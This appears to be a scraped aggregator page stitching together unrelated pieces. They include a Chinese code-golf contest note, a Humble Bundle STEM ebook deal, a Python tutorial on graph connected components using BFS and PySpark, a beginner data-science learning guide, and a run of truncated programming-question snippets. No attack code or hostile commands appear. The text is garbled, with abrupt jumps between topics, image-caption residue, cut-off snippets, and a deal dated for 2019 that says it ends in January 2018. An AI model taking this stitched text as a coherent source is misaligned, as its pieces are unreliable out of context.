input();l=map(int,raw_input().split());print["NO","YES"][all([x-2<y<x+2 for x,y in zip(l,l[1:])])]

98B还是第二。。第一的Ruby只要85B,缩不动了。。(Python读入就很操蛋吧

E. Cheese Board

答案是所有蛋糕能soft/hard相间地放在$n\times n$棋盘上的最小$n$。。(先坑着

F. 2 + 2 != 4

看了题解。。是把每个数(第一个除外)前面的符号也算进去,然后根据ASCII码, + 算$-5$, - 算$-3$。比如说+233就是加上$(-5)\cdot 10^3+2\cdot 10^2+3\cdot 10+3$。。

先坑着。。

G. Puzzling Language

坑着

Geek Deals: DRM-Free STEM Books Starting at $1

$
0
0

Geek Deals: DRM-Free STEM Books Starting at https://qnpic1.fangketong.net//201812/30/20181230_18088_1292872_0.jpg!web

If you’re ready to start the new year out on the right foot, this Humble Book Bundle is a fantastic way to learn. Jump in for as little as a buck, and your 2019 can be filled with new skills.

Humble Book Bundle: STEM by Mercury Learning


Geek Deals: DRM-Free STEM Books Starting at https://qnpic1.fangketong.net//201812/30/20181230_18088_1292872_1.png!web

A minimum of a solitary dollar will net you nine multi-format ebooks that cover a wide variety of STEM areas. This is an affordable opportunity to learn more about physics, electrical engineering, and modeling with AutoCAD.

Spend at least $1 AutoCAD 2019 3D Modelling Alzheimer’s Disease Electrical Engineering Experiments Foundations of Mathematics: Algebra, Geometry, Trigonometry, Calculus Industrial Engineering Foundations Mathematical Physics Operating Systems Physics Lab Experiments Software Testing Principles and Practices

Opt for the middle tier, and you’ll also receive 10 DRM-free books on topics like automation, AI, and wireless sensor networks.

Spend at least $8 Artificial Intelligence and Problem Solving Basic Electromagnetic Theory Cloud Computing Basics: A Self-Teaching Introduction Finite Element Analysis: A Primer Radar Systems and Radio Aids to Navigation Hazardous Waste Management Industrial Automation & Robotics Multivariable and Vector Calculus Solid State Physics Wireless Sensor Networks

The third and final tier requires just a $15 investment, and it’ll grant you access to 13 more ebooks. Learn about python, network security, MATLAB, and more.

Spend at least $15 Applied Linear Algebra and Optimization Using MATLAB AutoCAD 2019 Beginning & Intermediate Basic Electronics HDL with Digital Design Heart Disease and Health Machine Methods Network Security and Cryptography Numerical Methods in Engineering and Science ( C, C++, MATLAB) Ocean Instrumentation, Electronics, and Energy Python Basics: A Self-Teaching Introduction Quantum Mechanics Computer Graphics Programming in OpenGL With JAVA Real-Time Embedded Components and Systems With linux and RTOS

And since some of your purchase will benefit the WDC, Whale and Dolphin Conservation, you’ll be able to do good while learning. This non-profit is working tirelessly to protect vulnerable sea mammals, and any amount will be helpful.

Sale Ends:January 7th, 2018 at 11:00AM PT

Note: Terms and conditions apply. See the Humble site for more information.

For more great Humble deals, go to TechBargains .

To all Data Scientists The one Graph Algorithm you need to know

$
0
0

Graphs provide us with a very useful data structure. They can help us to find structure within our data. With the advent of Machine learning and big data we need to get as much information as possible about our data. Learning a little bit of graph theory can certainly help us with that.

Here is a Graph Analytics for Big Data course on Coursera by UCSanDiego which I highly recommend to learn the basics of graph theory.

One of the algorithms I am going to focus in the current post is called Connected Components . Why it is important. We all know clustering.

You can think of Connected Components in very layman's terms as sort of a hard clustering algorithm which finds clusters/islands in related/connected data. As a concrete example: Say you have data about roads joining any two cities in the world. And you need to find out all the continents in the world and which city they contain.

How will you achieve that? Come on give some thought.

To put a Retail Perspective : Lets say, we have a lot of customers using a lot of accounts. One way in which we can use the Connected components algorithm is to find out distinct families in our dataset. We can assume edges(roads) between CustomerIDs based on same credit card usage, or same address or same mobile number etc. Once we have those connections, we can then run the connected component algorithm on the same to create individual clusters to which we can then assign a family ID. We can use these family IDs to provide personalized recommendations based on a family needs. We can also use this family ID to fuel our classification algorithms by creating grouped features based on family.

In Finance Perspective : Another use case would be to capture fraud using these family IDs. If an account has done fraud in past, it is highly probable that the connected accounts are also susceptible to fraud.

So enough of use cases. Lets start with a simple graph class written in python to start up our exploits with code.

This post will revolve more around code from here onwards.

""" A Python Class A simple Python graph class, demonstrating the essential facts and functionalities of graphs. Taken from https://www.python-course.eu/graphs_python.php Changed the implementation a little bit to include weighted edges """ class Graph(object): def __init__(self, graph_dict=None): """ initializes a graph object If no dictionary or None is given, an empty dictionary will be used """ if graph_dict == None: graph_dict = {} self.__graph_dict = graph_dict def vertices(self): """ returns the vertices of a graph """ return list(self.__graph_dict.keys()) def edges(self): """ returns the edges of a graph """ return self.__generate_edges() def add_vertex(self, vertex): """ If the vertex "vertex" is not in self.__graph_dict, a key "vertex" with an empty dict as a value is added to the dictionary. Otherwise nothing has to be done. """ if vertex not in self.__graph_dict: self.__graph_dict[vertex] = {} def add_edge(self, edge,weight=1): """ assumes that edge is of type set, tuple or list """ edge = set(edge) (vertex1, vertex2) = tuple(edge) if vertex1 in self.__graph_dict: self.__graph_dict[vertex1][vertex2] = weight else: self.__graph_dict[vertex1] = {vertex2:weight} if vertex2 in self.__graph_dict: self.__graph_dict[vertex2][vertex1] = weight else: self.__graph_dict[vertex2] = {vertex1:weight} def __generate_edges(self): """ A static method generating the edges of the graph "graph". Edges are represented as sets with one (a loop back to the vertex) or two vertices """ edges = [] for vertex in self.__graph_dict: for neighbour,weight in self.__graph_dict[vertex].iteritems(): if (neighbour, vertex, weight) not in edges: edges.append([vertex, neighbour, weight]) return edges def __str__(self): res = "vertices: " for k in self.__graph_dict: res += str(k) + " " res += "\nedges: " for edge in self.__generate_edges(): res += str(edge) + " " return res def adj_mat(self): return self.__graph_dict

You can certainly play with our new graph class.Here we try to build some graphs.

g = { "a" : {"d":2}, "b" : {"c":2}, "c" : {"b":5, "d":3, "e":5} } graph = Graph(g) print("Vertices of graph:") print(graph.vertices()) print("Edges of graph:") print(graph.edges()) print("Add vertex:") graph.add_vertex("z") print("Vertices of graph:") print(graph.vertices()) print("Add an edge:") graph.add_edge({"a","z"}) print("Vertices of graph:") print(graph.vertices()) print("Edges of graph:") print(graph.edges()) print('Adding an edge {"x","y"} with new vertices:') graph.add_edge({"x","y"}) print("Vertices of graph:") print(graph.vertices()) print("Edges of graph:") print(graph.edges()) Vertices of graph: ['a', 'c', 'b'] Edges of graph: [['a', 'd', 2], ['c', 'b', 5], ['c', 'e', 5], ['c', 'd', 3], ['b', 'c', 2]] Add vertex: Vertices of graph: ['a', 'c', 'b', 'z'] Add an edge: Vertices of graph: ['a', 'c', 'b', 'z'] Edges of graph: [['a', 'z', 1], ['a', 'd', 2], ['c', 'b', 5], ['c', 'e', 5], ['c', 'd', 3], ['b', 'c', 2], ['z', 'a', 1]] Adding an edge {"x","y"} with new vertices: Vertices of graph: ['a', 'c', 'b', 'y', 'x', 'z'] Edges of graph: [['a', 'z', 1], ['a', 'd', 2], ['c', 'b', 5], ['c', 'e', 5], ['c', 'd', 3], ['b', 'c', 2], ['y', 'x', 1], ['x', 'y', 1], ['z', 'a', 1]]

Lets do something interesting now.

We will use the above graph class for our understanding purpose. There are many Modules in python which we can use to do whatever I am going to do next,but to understand the methods we will write everything from scratch. Lets start with an example graph which we can use for our purpose.


To all Data Scientists   The one Graph Algorithm you need to know
g = {'Frankfurt': {'Mannheim':85, 'Wurzburg':217, 'Kassel':173}, 'Mannheim': {'Frankfurt':85, 'Karlsruhe':80}, 'Karlsruhe': {'Augsburg':250, 'Mannheim':80}, 'Augsburg': {'Karlsruhe':250, 'Munchen':84}, 'Wurzburg': {'Erfurt':186, 'Numberg':103,'Frankfurt':217}, 'Erfurt': {'Wurzburg':186}, 'Numberg': {'Wurzburg':103, 'Stuttgart':183,'Munchen':167}, 'Munchen': {'Numberg':167, 'Augsburg':84,'Kassel':502}, 'Kassel': {'Frankfurt':173, 'Munchen':502}, 'Stuttgart': {'Numberg':183} } graph = Graph(g) print("Vertices of graph:") print(graph.vertices()) print("Edges of graph:") print(graph.edges()) Vertices of graph: ['Mannheim', 'Erfurt', 'Munchen', 'Numberg', 'Stuttgart', 'Augsburg', 'Kassel', 'Frankfurt', 'Wurzburg', 'Karlsruhe'] Edges of graph: [['Mannheim', 'Frankfurt', 85], ['Mannheim', 'Karlsruhe', 80], ['Erfurt', 'Wurzburg', 186], ['Munchen', 'Numberg', 167], ['Munchen', 'Augsburg', 84], ['Munchen', 'Kassel', 502], ['Numberg', 'Stuttgart', 183], ['Numberg', 'Wurzburg', 103], ['Numberg', 'Munchen', 167], ['Stuttgart', 'Numberg', 183], ['Augsburg', 'Munchen', 84], ['Augsburg', 'Karlsruhe', 250], ['Kassel', 'Munchen', 502], ['Kassel', 'Frankfurt', 173], ['Frankfurt', 'Mannheim', 85], ['Frankfurt', 'Wurzburg', 217], ['Frankfurt', 'Kassel', 173], ['Wurzburg', 'Numberg', 103], ['Wurzburg', 'Erfurt', 186], ['Wurzburg', 'Frankfurt', 217], ['Karlsruhe', 'Mannheim', 80], ['Karlsruhe', 'Augsburg', 250]]

Lets say we are given a graph with the cities of Germany and respective distance between them. You want to find out how to go from Frankfurt (The starting node) to Munchen . There might be many ways in which you can traverse the graph but you need to find how many cities you will need to visit on a minimum to go from frankfurt to Munchen) This problem is analogous to finding out distance between nodes in an unweighted graph.

The algorithm that we use here is called as Breadth First Search .

def min_num_edges_between_nodes(graph,start_node): distance = 0 shortest_path = [] queue = [start_node] #FIFO levels = {} levels[start_node] = 0 shortest_paths = {} shortest_paths[start_node] = ":" visited = [start_node] while len(queue)!=0: start = queue.pop(0) neighbours = graph[start] for neighbour,_ in neighbours.iteritems(): if neighbour not in visited: queue.append(neighbour) visited.append(neighbour) levels[neighbour] = levels[start]+1 shortest_paths[neighbour] = shortest_paths[start] +"->"+ start return levels, shortest_paths

What we do in the above piece of code is create a queue and traverse it based on levels. We start with Frankfurt as starting node. We loop through its neighbouring cities(Menheim, Wurzburg and Kassel) and push them into the queue. We keep track of what level they are at and also the path through which we reached them. Since we are popping a first element of a queue we are sure we will visit cities in the order of their level.

Checkout this good post about BFS to understand more about queues and BFS.

min_num_edges_between_nodes(g,'Frankfurt') ({'Augsburg': 3, 'Erfurt': 2, 'Frankfurt': 0, 'Karlsruhe': 2, 'Kassel': 1, 'Mannheim': 1, 'Munchen': 2, 'Numberg': 2, 'Stuttgart': 3, 'Wurzburg': 1}, {'Augsburg': ':->Frankfurt->Mannheim->Karlsruhe', 'Erfurt': ':->Frankfurt->Wurzburg', 'Frankfurt': ':', 'Karlsruhe': ':->Frankfurt->Mannheim', 'Kassel': ':->Frankfurt', 'Mannheim': ':->Frankfurt', 'Munchen': ':->Frankfurt->Kassel', 'Numberg': ':->Frankfurt->Wurzburg', 'Stuttgart': ':->Frankfurt->Wurzburg->Numberg', 'Wurzburg': ':->Frankfurt'})

I did this example to show how BFS algorithm works. We can extend this algorithm to find out connected components in an unconnected graph. Lets say we need to find groups of unconnected vertices in the graph.

For example: the below graph has 3 unconnected sub-graphs. Can we find what nodes belong to a particular subgraph?


To all Data Scientists   The one Graph Algorithm you need to know
#We add another countries in the loop graph = Graph(g) graph.add_edge(("Mumbai", "Delhi"),400) graph.add_edge(("Delhi", "Kolkata"),500) graph.add_edge(("Kolkata", "Bangalore"),600) graph.add_edge(("TX", "NY"),1200) graph.add_edge(("ALB", "NY"),800) g = graph.adj_mat() def bfs_connected_components(graph): connected_components = [] nodes = graph.keys() while len(nodes)!=0: start_node = nodes.pop() queue = [start_node] #FIFO visited = [start_node] while len(queue)!=0: start = queue[0] queue.remove(start) neighbours = graph[start] for neighbour,_ in neighbours.iteritems(): if neighbour not in visited: queue.append(neighbour) visited.append(neighbour) nodes.remove(neighbour) connected_components.append(visited) return connected_components print bfs_connected_components(g)

The above code is similar to the previous BFS code. We keep all the vertices of the graph in the nodes list. We take a node from the nodes list and start BFS on it. as we visit a node we remove that node from the nodes list. Whenever the BFS completes we start again with another node in the nodes list until the nodes list is empty.

[['Kassel', 'Munchen', 'Frankfurt', 'Numberg', 'Augsburg', 'Mannheim', 'Wurzburg', 'Stuttgart', 'Karlsruhe', 'Erfurt'], ['Bangalore', 'Kolkata', 'Delhi', 'Mumbai'], ['NY', 'ALB', 'TX']]

As you can see we are able to find distinct components in our data. Just by using Edges and Vertices. This algorithm could be run on different data to satisfy any use case I presented above.

But Normally using Connected Components for a retail case will involve a lot of data and you will need to scale this algorithm.

Connected Components in PySpark

Below is an implementation from this paper on Connected Components in MapReduce and Beyond from Google Research. Read the PPT to understand the implementation better. Some ready to use code for you.

def create_edges(line): a = [int(x) for x in line.split(" ")] edges_list=[] for i in range(0, len(a)-1): for j in range(i+1 ,len(a)): edges_list.append((a[i],a[j])) edges_list.append((a[j],a[i])) return edges_list # adj_list.txt is a txt file containing adjacency list of the graph. adjacency_list = sc.textFile("adj_list.txt") edges_rdd = adjacency_list.flatMap(lambda line : create_edges(line)).distinct() def largeStarInit(record): a, b = record yield (a,b) yield (b,a) def largeStar(record): a, b = record t_list = list(b) t_list.append(a) list_min = min(t_list) for x in b: if a < x: yield (x,list_min) def smallStarInit(record): a, b = record if b<=a: yield (a,b) else: yield (b,a) def smallStar(record): a, b = record t_list = list(b) t_list.append(a) list_min = min(t_list) for x in t_list: if x!=list_min: yield (x,list_min) #Handle case for single nodes def single_vertex(line): a = [int(x) for x in line.split(" ")] edges_list=[] if len(a)==1: edges_list.append((a[0],a[0])) return edges_list iteration_num =0 while 1==1: if iteration_num==0: print "iter", iteration_num large_star_rdd = edges_rdd.groupByKey().flatMap(lambda x : largeStar(x)) small_star_rdd = large_star_rdd.flatMap(lambda x : smallStarInit(x)).groupByKey().flatMap(lambda x : smallStar(x)).distinct() iteration_num += 1 else: print "iter", iteration_num large_star_rdd = small_star_rdd.flatMap(lambda x: largeStarInit(x)).groupByKey().flatMap(lambda x : largeStar(x)).distinct() small_star_rdd = large_star_rdd.flatMap(lambda x : smallStarInit(x)).groupByKey().flatMap(lambda x : smallStar(x)).distinct() iteration_num += 1 #check Convergence changes = (large_star_rdd.subtract(small_star_rdd).union(small_star_rdd.subtract(large_star_rdd))).collect() if len(changes) == 0 : break single_vertex_rdd = adjacency_list.flatMap(lambda line : single_vertex(line)).distinct() answer = single_vertex_rdd.collect() + large_star_rdd.collect() print answer[:10] Or Use GraphFrames in PySpark

To Install graphframes:

I ran on command line: pyspark --packages graphframes:graphframes:0.5.0-spark2.1-s_2.11 which opened up my notebook and installed graphframes after i try to import in my notebook.

The string to be formatted as : graphframes:(latest version)-spark(your spark version)-s_(your scala version).

Checkout this guide on how to use GraphFrames for more information.

from graphframes import * def vertices(line): vert = [int(x) for x in line.split(" ")] return vert vertices = adjacency_list.flatMap(lambda x: vertices(x)).distinct().collect() vertices = sqlContext.createDataFrame([[x] for x in vertices], ["id"]) def create_edges(line): a = [int(x) for x in line.split(" ")] edges_list=[] if len(a)==1: edges_list.append((a[0],a[0])) for i in range(0, len(a)-1): for j in range(i+1 ,len(a)): edges_list.append((a[i],a[j])) edges_list.append((a[j],a[i])) return edges_list edges = adjacency_list.flatMap(lambda x: create_edges(x)).distinct().collect() edges = sqlContext.createDataFrame(edges, ["src", "dst"]) g = GraphFrame(vertices, edges) sc.setCheckpointDir(".") # graphframes uses the same paper we referenced apparently cc = g.connectedComponents() print cc.show()

The GraphFrames library implements the CC algorithm as well as a variety of other graph algorithms.

The above post was a lot of code but hope it was helpful. It took me a lot of time to implement the algorithm so wanted to make it easy for the folks.

If you want to read up more on Graph Algorithms here is an Graph Analytics for Big Data course on Coursera by UCSanDiego which I highly recommend to learn the basics of graph theory.

References Graphs in Python A Gentle Intoduction to Graph Theory Blog Graph Analytics for Big Data course on Coursera by UCSanDiego

Learn Python for Data Science from Scratch

$
0
0
Why python?

Python is a multipurpose programming language and widely used for Data Science, which is termed as the sexiest job of this century. Data Scientist mine thru the large dataset to gain insight and make meaningful data driven decisions. Python is used as general purposed programming language and used for Web Development, Networking, Scientific computing etc. We will be discussing further about the series of awesome libraries in python such as numpy, scipy & pandas for data manipulation & wrangling and matplotlib, seaborn & bokeh for data visualization.

So Python & R is just used as a tool for data science but for being a data scientist you need to know more about the statistical & mathematical aspects of the data and on top of everything a good domain knowledge is must.

In my this postI will pave the path for learning Data science with Python and will share some useful resources for learning it.Remember learning for data science is time taking stuff and cannot be completed in a month or so and it requires a lot of practice, dedication and self confidence. So never giveup and happy learning.

Step 1: Learning the basics for python

Python is an easy to start language but to master the idioms takes time like any other language. So as a novice first you need to understand all the basics for the language and a good start would be to follow these tutorials:

Tutorial Points

&

Google Python Class

Once you have completed this tutorial then it’s time to take a bigger leap and understands the more complex and real time python usage and best bet would be reading few books and blog posts:

Books:

a) Learn Python the Hardway

b) Automate Boring Stuffs with Python

Blogs:

a) Top 20 Python Blogs

b) One of My favorite blog : DanBader

Step 2: Basic Statistics & Mathematics

Would highly recommend learning statistics with a heavy focus on coding up examples, preferably in Python or R.

Most famous are the Statistical Learning series. It’s a great primer on statistical modeling / machine learning with applications in R. Read ISLR first before you jump to ESLR.

a) An Introduction to Statistical Learning

b) The Elements of Statistical Learning

If you want something with a Python heavy, Check out this book “Think Stats”

This a great MOOC’s to learn basic statistics needed for Data science:

― Statistics with R Specialization

Brush up your high school statistical & mathematical knowledge using this awesome Khan’s academy series:

High School Stats

Step 3: Python for Data Analysis

Once you are done with Step 1 & Step 2 then it’s time to get your hands dirty with some real stuffs, First you need to install the Anaconda

Anaconda Download

Advantages of Anaconda:

a) User level install of the version of python you want

b) Able to install/update packages completely independent of system libraries or admin privileges

c) Comes with numpy, scipy, PyQt, spyder IDE, etc. or in minimal / alacarte version (miniconda) where you can install what you want, when you need it.

These are the tool which comes with Anaconda:

a) Jupyter notebook : The IPython Notebook is now known as the Jupyter Notebook. It is an interactive computational environment, in which you can combine code execution, rich text, mathematics, plots and rich media.

you can use this notebook locally for data analysis and plotting graphs and visualizing the data and eventually sharing it

After installing Anaconda open ipython notebook from Terminal:
Learn Python for Data Science from Scratch
Notebook opens in your default browser:
Learn Python for Data Science from Scratch
Execute Python code in Notebook cell
Learn Python for Data Science from Scratch
b) Numpy

NumPy is the fundamental package for scientific computing with Python. It contains among other things:

1) a powerful N-dimensional array object

2) sophisticated (broadcasting) functions

3) tools for integrating C/C++ and Fortran code

4) useful linear algebra, Fourier transform, and random number capabilities

URL: Numpy

c) Pandas

pandas is a software library written for the Python programming language for data manipulation and analysis.

check my posthere for a simple and brief introduction to Pandas

URL: Pandas

Book: Python for Data Analysis by Wes Mckiney

d) Matplotlib

Matplotlib is a Python 2D plotting library which produces publication quality figures in a variety of hardcopy formats and interactive environments across platforms. Matplotlib can be used in Python scripts, the Python and IPython shell, the jupyter notebook, web application servers, and four graphical user interface toolkits.

URL: Matplotlib

check my posthere for a simple and brief introduction to matplotlib

e) Seaborn

Seaborn is a Python visualization library based on matplotlib. It provides a high-level interface for drawing attractive statistical graphics

URL: Seaborn

Check the below figures of Jupyter notebook which is using all of the above libraries for Data Analysis:

a) Data Import using Pandas:


Learn Python for Data Science from Scratch

b) DataAnalysis & Cleaning:


Learn Python for Data Science from Scratch

c) Plotting Graphs using Plotly (alternatively, matplotlib & seaborn can also be used)


Learn Python for Data Science from Scratch

c) Plotting Boxplot, Bar Graphs & Heatmaps in Jupyter notebook

Step 4: Machine Learning

Machine learning is the science of getting computers to act without being explicitly programmed. The machine learns from the large set of training data and helps to predict or classify on the new dataset.

it is classified into following two categroies:

(i) Supervised learning (parametric/non-parametric algorithms, support vector machines, kernels, neural networks).

(ii) Unsupervised learning (clustering, dimensionality reduction, recommender systems, deep learning).

Install Python Scikit

List of nested predicates

$
0
0
Advanced sorting criteria for a list of nested tuples I have a list of nested tuples of the form: [(a, (b, c)), ...] Now I would like to pick the element which maximizes a while minimizing b and c at the same time. For example in [(7, (5, 1)), (7, (4, 1)), (6, (3, 1))] the winner should be (7, (4, 1)) A List split by predicate Is there a more concise way to split a list into two lists by a predicate? errors, okays = [], [] for r in results: if success_condition(r): okays.append(r) else: errors.append(r) I understand that this can be turned into an ugly one-liner using redu Adjust a list of nested lists in Erlang I'm working on the exercises in Erlang Programming. The question is Write a function that, given a list of nested lists, will return a flat list. Example: flatten([[1,[2,[3],[]]], [[[4]]], [5,6]]) [1,2,3,4,5,6]. Hint: use concatenate to solve flatt List of nested classes in Java?

Is there a way to make list of nested classes objects? I defined my nested classes like this: public class AB{ public class A { } public class B { } I want to make list like this: List<AB> listAB = new ArrayList<>(); AB.A objectA = AB.new A();

Write a list of nested dictionaries in Excel in python I have a list of nested dictionaries that looks like this: [{'posts': {'item_1': 1, 'item_2': 8, 'item_3': 105, 'item_4': 324, 'item_5': 313, }}, {'edits': {'item_1': 1, 'item_2': 8, 'item_3': 61, 'item_4': 178, 'item_5': 163}}, {'views': {'item_1': How to separate a linked list from a predicate to python?

I want to define a iterative function named separate; it is passed one linked list and a predicate; it returns a 2-tuple of two linked lists: the first is a linked list of all the values in the parameter where the predicate returns True; the second i

Python converts a list of nested tuples into dict Ok, so I am trying to write a Python function that turns the first line here, a list of nested tuples, into the second line, a flattened dictionary: [('Ka',0.6), ('La', 0.6), (('Ma', 0.7), ('Na', 0.8), ('Oa', 0.9))] {'La': 0.6, 'Ma': 0.7, 'Ka': 0.6, Validate a list of nested objects with a Spring validator?

I want to know how to validate a list of nested objects in my form with Spring Validator (not annotation) in Spring MVC application. class MyForm() { String myName; List<TypeA> listObjects; } class TypeA() { String number; String value; } How can I

How can I find the index of a list of nested lists that I recur? I'm having some trouble finding a way to get a list index against a list of nested lists. For example I can find out how many nodes, or the structure of the list for a given node with the following two functions. t = ['add', [ \ ['divide a', [ \ ['if Convert list of nested lists and dictations I have a set of data that looks similar to this: [ {"name":"item.key" , "value":"value"}, {"name":"item.key2" , "value":"value2"}, {"name":"item.list.0" , Python list on nested keys Im trying to create/populate a nested dictionary from a list. For example, a list [['a','b','c'],value] could create: data['a']['b']['c'] = value Giving me a dictionary: { 'a': { 'b': { 'c' : value } } } All help greatly appreciated.(Assuming that yo How do I search for a list for a predicate

I want to create a higher order function that takes in a S-Expr and predicate as arguments and and returns a list of all atoms inside the given s-expression which pass the given predicate For example (fetch number? '(the (quick 6 fox 8 9) slick 2)) a

Problem accessing the list table nested in Java

Sorry for the clunky title, English is not my first language. I'm having issues controlling how a nested for loop is going around a list of lists. Example: I have the letters, {A,B,C,D,E,F,G,H,I}. They are in the 2d list like this: List<List<Charact

Need help understanding the meaning of & ldquo; In a list of nested model arguments & rdquo; Error given by GCC

This compiles: std::map<int, std::vector<int> > vDescriptorAtom; This: std::map<int, std::vector<int>> vDescriptorAtom; gives the following error: src/MessageHandler.cpp:191: error: >> should be > > within a nested temp

Viewing all 9596 articles
Browse latest View live